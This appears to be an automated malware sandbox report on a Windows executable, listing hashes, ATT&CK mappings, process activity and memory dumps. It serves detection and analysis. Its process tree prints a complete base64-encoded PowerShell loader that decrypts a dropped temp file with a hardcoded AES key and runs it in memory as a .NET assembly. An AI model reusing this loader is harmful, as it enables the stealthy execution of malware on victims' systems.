29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7

General

Target

29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7_NeikiAnalytics.exe
Size

987KB
MD5

4159fce548f4229d4803ce6e5e2d0707
SHA1

188eb1c229a8cbdde36a294ac3c2a3ac2168ff72
SHA256

29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7
SHA512

6600e40ed00baa3ed021e0b647025fc51f2bb313af6ed7a8e0de07b26f9989c8207f2c079b9f15b18246651d142c596af7f20fb4c7b8edccc08a50b4dd23944f
SSDEEP

24576:IyDtH9ivKgfG9pkNem5dwYeKrHHPYSpmqF:IwdcvKc8YlQKrHHPYSEqF

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3048	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3048	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1008 wrote to memory of 3048	1008	29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7_NeikiAnalytics.exe	29
PID 1008 wrote to memory of 3048	1008	29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7_NeikiAnalytics.exe	29
PID 1008 wrote to memory of 3048	1008	29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7_NeikiAnalytics.exe	29

C:\Users\Admin\AppData\Local\Temp\29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7_NeikiAnalytics.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADQANwAsACAAMAB4AEEAOAAsACAAMAB4ADkANQAsACAAMAB4ADUARQAsACAAMAB4AEYAMgAsACAAMAB4AEQAQQAsACAAMAB4ADkAQQAsACAAMAB4AEEAMQAsACAAMAB4ADgAMwAsACAAMAB4ADQANwAsACAAMAB4AEEAMQAsACAAMAB4ADYARQAsACAAMAB4ADgANwAsACAAMAB4AEIANgAsACAAMAB4AEYANgAsACAAMAB4ADAARQAsACAAMAB4ADgAOAAsACAAMAB4AEMAQQAsACAAMAB4ADYAQwAsACAAMAB4ADIAQQAsACAAMAB4ADQAQwAsACAAMAB4ADAAOQAsACAAMAB4AEIARQAsACAAMAB4ADMANwAsACAAMAB4ADUAQgAsACAAMAB4AEUANgAsACAAMAB4AEMANAAsACAAMAB4ADkANAAsACAAMAB4AEUANAAsACAAMAB4AEMAOAAsACAAMAB4ADMARgAsACAAMAB4ADkANQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADMALAAgADAAeAA0ADMALAAgADAAeAAxAEEALAAgADAAeAA1AEUALAAgADAAeAA2ADMALAAgADAAeABGADEALAAgADAAeAAyADIALAAgADAAeAA3AEQALAAgADAAeAA3ADgALAAgADAAeABGAEMALAAgADAAeAAzADYALAAgADAAeAA3ADMALAAgADAAeAAzADIALAAgADAAeABEADYALAAgADAAeAA4ADUALAAgADAAeAAwAEQAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-18817.putik

Filesize
33KB

MD5
8998dbb6f0a43a5f64e7d688f74a3168

SHA1
b10a1e9190a3955acaa25f80127f18d140d9a127

SHA256
ecda43d8f11e4211b02c61572cb82269fcb8985a42b53caebeefff546253d26c

SHA512
b8d13d6583a7ee357544be3b0f8c52576973cd9c18ea6b9f29978558e51e62f6fe1e8bc563f77498b4d0d9bd0ca28104687f20e73814623048169825c214c66b

Download Submit
memory/3048-5-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

Filesize
4KB

Download
memory/3048-6-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/3048-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/3048-7-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/3048-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/3048-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/3048-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/3048-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/3048-14-0x0000000002A60000-0x0000000002A6C000-memory.dmp

Filesize
48KB

Download
memory/3048-15-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing